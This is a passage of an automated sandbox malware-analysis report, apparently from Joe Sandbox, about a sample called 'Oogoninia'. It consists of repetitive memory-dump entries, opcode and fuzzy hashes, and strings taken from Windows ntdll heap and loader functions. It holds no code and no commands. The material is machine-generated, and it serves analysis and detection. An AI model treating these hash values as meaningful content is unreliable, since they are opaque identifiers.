                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 14aa541e19dddc2303ac22232263b6b76f791056451947dbb585a67b9385d60a
                                                                                                                                                                                    • Instruction ID: 03cf2154f910532a5dbd70e67a59308c86315fe50597de945ad54b4c420b4213
                                                                                                                                                                                    • Opcode Fuzzy Hash: 14aa541e19dddc2303ac22232263b6b76f791056451947dbb585a67b9385d60a
                                                                                                                                                                                    • Instruction Fuzzy Hash: BC90023124140402D600615D5A1C78700454BD0312F51C816A5254515ED675C9997531
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 3321a96339df36536206c7091345e412341bd04bc76217ed2c0d777a9ebe3eb5
                                                                                                                                                                                    • Instruction ID: 41c375b6ee40121d0334fc82e0031cf271b8bc06aa0fa5d20b0942e534141dfc
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3321a96339df36536206c7091345e412341bd04bc76217ed2c0d777a9ebe3eb5
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5490026125100042D604615D561874600854BE1211F51C817A2244514CD5398D697125
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: f9090d386601709f99be94e5859f5c37b770db482d34425c40b5dc18991c02b0
                                                                                                                                                                                    • Instruction ID: d4601e9c9d6c6d358b19d4773f028dd6eb09f943659323c367d124f4cdcef7d9
                                                                                                                                                                                    • Opcode Fuzzy Hash: f9090d386601709f99be94e5859f5c37b770db482d34425c40b5dc18991c02b0
• Instruction Fuzzy Hash: 5E90022125180042D700656D5E28B4700454BD0313F51C91AA0244514CD92589697521
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c0475b7a59f6218d961060f5023f9e46c2ad027e54bd7df14aaa967baf41b510
• Instruction ID: 1733763710d7f22754eb741a32eefaef1dc9a62f2831f9f37eba1b2bd5199f2d
• Opcode Fuzzy Hash: c0475b7a59f6218d961060f5023f9e46c2ad027e54bd7df14aaa967baf41b510
• Instruction Fuzzy Hash: 7090022124144442D640625D5A18B4F41454BE1212F91C81EA4246514CD925895D7721
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1d0a19c2b78d0dc411141d219c2bec65f95554a4605c57ff5b332ed6697ee4ea
• Instruction ID: a7fb5e12e198d137de11a8233246f4d934c76713a463871443156984e802b232
• Opcode Fuzzy Hash: 1d0a19c2b78d0dc411141d219c2bec65f95554a4605c57ff5b332ed6697ee4ea
• Instruction Fuzzy Hash: 7F90022128100802D640715D962874700468BD0611F51C816A0114514DD6268A6D76B1
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c0914a8a8e21997337aca70f2fae0d6b6dcb23709e0788cbc11d69c5f6fe680a
• Instruction ID: 4976264ff419bc56e847e60af7629c36f9dc0d24cabb9304c5005745e40582af
• Opcode Fuzzy Hash: c0914a8a8e21997337aca70f2fae0d6b6dcb23709e0788cbc11d69c5f6fe680a
• Instruction Fuzzy Hash: 1A90022134100003D640715D662C64640459BE1311F51D816E0504514CE925895E7222
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5cb4e5e6a9b8a5800364aef02590123a9e96d7bb9c3e331c8186baeecfb67dae
• Instruction ID: 8ba5d7cc4975c7c8f5e11b6d4094204d49f9e4fcca873e469edfe86b1ed1fe1c
• Opcode Fuzzy Hash: 5cb4e5e6a9b8a5800364aef02590123a9e96d7bb9c3e331c8186baeecfb67dae
• Instruction Fuzzy Hash: 2E90023124100403D600615D671C74700454BD0211F51DC16A0514518DE66689597121
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 09eb146810eb4f3ee03f9bfc0f2e7b7676c8d5a04d25e1daa2bc389932652c81
• Instruction ID: 0baf19b51c0508444ee6bbfef8c966da171df72896ae72ac21ccc60049c892d8
• Opcode Fuzzy Hash: 09eb146810eb4f3ee03f9bfc0f2e7b7676c8d5a04d25e1daa2bc389932652c81
• Instruction Fuzzy Hash: EB900231242001429A40625D6A18A8E41454BE1312B91DC1AA0105514CD92489697221
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 71829930be2dfbe174bbdc6a9c08b4b8d161807df773d69a78f0c7963b79131c
• Instruction ID: bb19839817d4e6195b9a0065df051077960df7557407a3ad0e2062ad674e664d
• Opcode Fuzzy Hash: 71829930be2dfbe174bbdc6a9c08b4b8d161807df773d69a78f0c7963b79131c
• Instruction Fuzzy Hash: 2890022925300002D680715D661C64A00454BD1212F91DC1AA0105518CD925896D7321
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5d4257970b443e9e834722456b5bdf8999e34d2999944ea834d548b6a78682b1
• Instruction ID: 00c0a487aaa8b0906b02974059fa7827c81c93b1f26d551232d37793717e3862
• Opcode Fuzzy Hash: 5d4257970b443e9e834722456b5bdf8999e34d2999944ea834d548b6a78682b1
• Instruction Fuzzy Hash: 1190022124504442D600655D661CA4600454BD0215F51D816A1154555DD6358959B131
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fd866855fa897842c1424650af38e5a5aeac52432b27dab51d9a19786d05e8ff
• Instruction ID: 0698edb8e2c9d74ac16cf1127fa51626d64611dfc62b7cd6eb9bcc420aeec519
• Opcode Fuzzy Hash: fd866855fa897842c1424650af38e5a5aeac52432b27dab51d9a19786d05e8ff
• Instruction Fuzzy Hash: 3C90023128100402D641715D561864600495BD0251F91C817A0514514ED6658B5EBA61
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 47ac63de61a0f331a383e818799732ac872ee1747ad43bcb13939f75ad0ed005
• Instruction ID: 303f0523ad7ce54499020b0ac271c0452c8dc829649cc09c2360d9399f951ab4
• Opcode Fuzzy Hash: 47ac63de61a0f331a383e818799732ac872ee1747ad43bcb13939f75ad0ed005
• Instruction Fuzzy Hash: D5900221282041525A45B15D561854740465BE0251791C817A1504910CD536995EF621
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5a041473312d0bf604802677ef1da49a7ea22827bf7c2ed124b7d853524e9f82
• Instruction ID: 393a52c5af5fd125b9881a2b99ecb952d273e462068c4e845e0f6566798c844b
• Opcode Fuzzy Hash: 5a041473312d0bf604802677ef1da49a7ea22827bf7c2ed124b7d853524e9f82
• Instruction Fuzzy Hash: 4A90023524100402DA10615D6A1868600864BD0311F51DC16A0514518DD66489A9B121
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: 834a483db091ffa596df9f81c45cb2c308f20209eb5fc2ba9b3cb4c44f0093a6
                                                                                                                                                                                    • Instruction ID: 3089fcd833310bd8b4be97938930213752058439991f12cf89eeb5c60f39f35b
                                                                                                                                                                                    • Opcode Fuzzy Hash: 834a483db091ffa596df9f81c45cb2c308f20209eb5fc2ba9b3cb4c44f0093a6
                                                                                                                                                                                    • Instruction Fuzzy Hash: C690022134100402D602615D562864600498BD1355F91C817E1514515DD6358A5BB132
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID:
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                    • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                    • Instruction ID: 93754563f26cf7687a04ec7739928ae66d86da5565e6ebc4de703dc5b6e8a5f8
                                                                                                                                                                                    • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                                                                                                                                                    • Instruction Fuzzy Hash:

Control-flow Graph (function at 325fa1f0; graph data omitted)

APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: HEAP:
• API String ID: 3446177414-2466845122
• Opcode ID: 6a91c05e633434382764b843e345fa485929e229a213dca1beeb35f258cf0060
• Instruction ID: e707ddc3f0aa39952ca111e4b0736988f2d2e5649475a76a69ffe94a8d06ad0a
• Opcode Fuzzy Hash: 6a91c05e633434382764b843e345fa485929e229a213dca1beeb35f258cf0060
• Instruction Fuzzy Hash: E8A1DD71614311EFD705CE18C894A1ABBE2FF88B54F04492DEA45DB350EB32EE45CB92

Control-flow Graph (function at 32557550; graph data omitted)

Strings
• CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 32594530
• CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 32594507
• ExecuteOptions, xrefs: 325944AB
• Execute=1, xrefs: 3259451E
• CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3259454D
• CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 32594460
• CLIENT(ntdll): Processing section info %ws..., xrefs: 32594592
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
• API String ID: 0-484625025
• Opcode ID: d7d3c252966d415fb04b9478ada10794971ba67cbb93f20b6db7c09999e1282a
• Instruction ID: d19b518ccdb30d4d29ae8006a0a4e4f87be051a464cd5a19c3b6c9f587c283c3
• Opcode Fuzzy Hash: d7d3c252966d415fb04b9478ada10794971ba67cbb93f20b6db7c09999e1282a
• Instruction Fuzzy Hash: 91512871A003197BEB119AA4DC95FED77E8EF48345F5004EAD906A7180EB70AF41CF50
Strings
• Actx , xrefs: 32587819, 32587880
• SsHd, xrefs: 3253A304
• SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 325877E2
• RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 325878F3
• RtlpFindActivationContextSection_CheckParameters, xrefs: 325877DD, 32587802
• SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32587807
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID:
• String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
• API String ID: 0-1988757188
• Opcode ID: a9a25c7982c7f677d095af0e740fde0e728a12566e7dc147738a1e36af69007d
• Instruction ID: ab1559e2e5f85283f058d38000195efc5c069bfd28ef26a82b8eadb1b6ca42f8
• Opcode Fuzzy Hash: a9a25c7982c7f677d095af0e740fde0e728a12566e7dc147738a1e36af69007d
• Instruction Fuzzy Hash: 09E105796053418FE706CF24C890B5ABBE1BF85368F501A2DFE65CB290DB71DA45CB82
APIs
Strings
• Actx , xrefs: 32589315
• SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32589153
• GsHd, xrefs: 3253D794
• RtlpFindActivationContextSection_CheckParameters, xrefs: 3258914E, 32589173
• RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 32589372
• SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 32589178
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
Similarity
• API ID: DebugPrintTimes
• String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
• API String ID: 3446177414-2196497285
• Opcode ID: 4dd926d00e06487a5fa7f20303e3aaece6e1965e195a645cdd862779120fab46
• Instruction ID: 913f2448de4553dedaf21a5d285fd805a4f52eab1d37139ee0ee98e90e6bc15f
• Opcode Fuzzy Hash: 4dd926d00e06487a5fa7f20303e3aaece6e1965e195a645cdd862779120fab46
• Instruction Fuzzy Hash: A3E1B27560A3419FE705CF14C880B5AFBF4BF88758F405A2DEA958B381DB71EA44CB92
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
• Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                                                                                                                                                    • API String ID: 3446177414-4227709934
                                                                                                                                                                                    • Opcode ID: a22cf8049b7b27778ca2d71a4aeeb1a8892c2bd80ba6dca6391a686c47a15b35
                                                                                                                                                                                    • Instruction ID: 91525fb2bfa743c3e2981dd4ae2d1f6d1f6488c88e217824ae5cac13053ac1e2
                                                                                                                                                                                    • Opcode Fuzzy Hash: a22cf8049b7b27778ca2d71a4aeeb1a8892c2bd80ba6dca6391a686c47a15b35
                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E416DB9A01209ABDB01CF95C980ADEBFB5FF88754F144429ED05A7350DB71AF81CB90
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                                                                                                                                    • API String ID: 3446177414-3492000579
                                                                                                                                                                                    • Opcode ID: 61a3906da297f0eae95ecb51a74aa9f311eb3e668c0171ce0ecf3eea0a51cb3b
                                                                                                                                                                                    • Instruction ID: 03c9201c09a02bbd60be05b25f26e2a4c40a5b1313675c432a076e3881023bb0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 61a3906da297f0eae95ecb51a74aa9f311eb3e668c0171ce0ecf3eea0a51cb3b
                                                                                                                                                                                    • Instruction Fuzzy Hash: EF712F75A01694EFDB05CFA8D490AADFBF2FF88318F44845AE445EB251DB71AB81CB40
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32579843
                                                                                                                                                                                    • minkernel\ntdll\ldrinit.c, xrefs: 32579854, 32579895
                                                                                                                                                                                    • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 32579885
                                                                                                                                                                                    • LdrpLoadShimEngine, xrefs: 3257984A, 3257988B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                    • API String ID: 3446177414-3589223738
                                                                                                                                                                                    • Opcode ID: 93e778a42a6b3a5fc05e0a36091f9f222bc5ae3c437a281dc6f8dc4c56b163fc
                                                                                                                                                                                    • Instruction ID: d435eedff302414f95d58d84c941711798b73c97fffd4ede793ace804fed6c94
                                                                                                                                                                                    • Opcode Fuzzy Hash: 93e778a42a6b3a5fc05e0a36091f9f222bc5ae3c437a281dc6f8dc4c56b163fc
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7851F575A42354AFEB04DBA8CC54F9D7BB6AF88314F440566E501FB295CBB0BE81C790
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                                                                                                                                                    • API String ID: 3446177414-3224558752
                                                                                                                                                                                    • Opcode ID: aeacbb5f1e3e4578e8e9450a5e7a3b4ee2dbe86d442fee2221c60190313a03ac
                                                                                                                                                                                    • Instruction ID: 9f3060174695caf763029e20feb32902f8df6637b50a33b2d3babbd657fd4b96
                                                                                                                                                                                    • Opcode Fuzzy Hash: aeacbb5f1e3e4578e8e9450a5e7a3b4ee2dbe86d442fee2221c60190313a03ac
                                                                                                                                                                                    • Instruction Fuzzy Hash: 00413535701740EFE711CF29C444B5ABBA4FF88364F5489AAE80597691CFB8AB81CB91
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • Entry Heap Size , xrefs: 325CEDED
                                                                                                                                                                                    • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 325CEDE3
                                                                                                                                                                                    • HEAP: , xrefs: 325CECDD
                                                                                                                                                                                    • ---------------------------------------, xrefs: 325CEDF9
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_324f0000_Oogoninia.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: DebugPrintTimes
                                                                                                                                                                                    • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                                                                                                                                    • API String ID: 3446177414-1102453626
                                                                                                                                                                                    • Opcode ID: dffaf34347e3f9852ec9e04b82001a09762ad81ee0ec5f38bb879063836f34b4
                                                                                                                                                                                    • Instruction ID: 90d02df8b6638f86dfc8526184835f0570020a90cb262fa26a78f3789f1e6a80
                                                                                                                                                                                    • Opcode Fuzzy Hash: dffaf34347e3f9852ec9e04b82001a09762ad81ee0ec5f38bb879063836f34b4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 40418F79A41225EFD705CF55C580959BBF5EF8935471588BED404AB210EB31FE82CBD0
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 324F0000, based on PE: true
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.0000000032619000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
